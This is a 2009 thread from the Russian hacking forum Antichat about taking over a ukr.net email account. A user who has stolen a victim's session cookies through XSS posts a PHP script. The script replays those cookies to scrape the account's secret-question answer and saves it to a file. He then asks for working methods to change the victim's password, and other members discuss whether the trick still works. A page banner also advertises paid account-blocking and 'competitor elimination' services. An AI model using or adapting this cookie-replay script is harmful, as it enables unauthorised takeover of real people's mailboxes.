Форум АНТИЧАТ - ukrNet: поиметь пароль

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > E-Mail
ukrNet: поиметь пароль

Опции темы

Поиск в этой теме

Опции просмотра

ukrNet: поиметь пароль

22.04.2009, 17:29

firemen

Новичок

Регистрация: 03.06.2006

Сообщений: 22

Провел на форуме:
79448

Репутация: 1

ukrNet: поиметь пароль

через XSS имею куки.
захожу на ящик жертвы нормально.

не нашел, за что бы зацепиться поменять пароль, не зная текущего...

в востановлении пароля используется секретный вопрос.

погуглив, нашел старенький скрипт, позволяющий имея куки выдрать ответ на секретный вопрос, правда работу его немного не понял )

вот он:

PHP код:


		
			
<?

$query=$_SERVER["QUERY_STRING"];

$query=urldecode($query);

$header="GET http://e.ukr.net/cgi-bin/userinfo HTTP/1.0rn"; 

$header.="Referer: http://e.ukr.netrn";

$header.="Cookie: ".$query."rn";

$header.="Host: e.ukr.netrnrn";

$fp=fsockopen("e.ukr.net", 80); 

fwrite($fp, $header); 

$dt=""; 

while (!feof($fp)) 

$dt.=fread($fp, 1024); 

// выдираем из полученной страницы ответ на секретный вопрос

$answ1=strpos($dt,'Password_Answer')+24; 

$answ2=strpos($dt,'" size="40">'); 

$length_answ=$answ2-$answ1; 

$full_answer=substr($dt,$answ1,$length_answ); 

// сохраняем полученный ответ на вопрос в файл: answer.html

$fp1=Fopen("answer.html","a"); 

fwrite($fp1,"$full_answer"); 

fclose($fp1); 

fclose($fp); 

?>

грамотные люди, подскажите есть ли рабочий скрипт такого плана или идеи по смене пароля..

удачи!

22.04.2009, 20:58

lmns

Постоянный

Регистрация: 21.02.2007

Сообщений: 568

Провел на форуме:
2954516

Репутация: 303

нет.
Возможно когда-то давно ответ на секретный вопрос можно было узнать просто попав в ящик, или сняв куки.
Данная строчка

Цитата:

$header="GET http://e.ukr.net/cgi-bin/userinfo HTTP/1.0rn";

обращение к данной странице, при помощи авторизации через куки.

22.04.2009, 21:07

mailbrush

Познавший АНТИЧАТ

Регистрация: 24.06.2008

Сообщений: 1,996

Провел на форуме:
6075534

Репутация: 2731

Отправить сообщение для mailbrush с помощью ICQ

Скрипт этот вообще древнейший. Какие-то стрпос... Все делается(лось) регулярками!

23.04.2009, 10:00

firemen

Новичок

Регистрация: 03.06.2006

Сообщений: 22

Провел на форуме:
79448

Репутация: 1

lmns не знал, что секретный вопрос лежал открыто раньше )

так что, значит не судьба поиметь пароль?

а народ, что за бабки ящики ломает, брутят что ли только?

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Аудит аутентификации на Web-сайтах. Часть первая	k00p3r	Чужие Статьи	0	13.06.2005 11:22

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход